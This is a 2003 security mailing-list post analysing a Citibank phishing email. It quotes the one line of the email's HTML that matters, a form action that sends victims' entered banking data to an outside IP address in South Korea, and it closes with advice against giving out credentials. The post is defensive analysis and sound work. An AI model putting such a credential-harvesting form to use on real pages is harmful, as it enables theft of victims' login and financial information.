[Dshield] Citibank Followup

John Dalton dubuque_1 at msn.com
Tue Sep 2 23:08:27 GMT 2003


I have to say, if you were not a suspicious user, this would fool you pretty
well. Looking at the source of the email I only see one line that redirects
the data, otherwise it gathers all its other parts from Citibank's site
itself.

The one line I reference is
<td align="center">
 <form action="http://211.193.190.42:65085/cgi-bin/c2it.php" method="get">

Which comes back to:
KOREA TELECOM PUSAN NODE
77-5 choongangdong4ga choongkoo
PUSAN
600-014
South Korea

You always wonder how many people actually fall for this, since it is a
official looking site. But it  just comes down to the old warning, never
give your password. Or credit information out unless you initiated the
contact.


More information about the list mailing list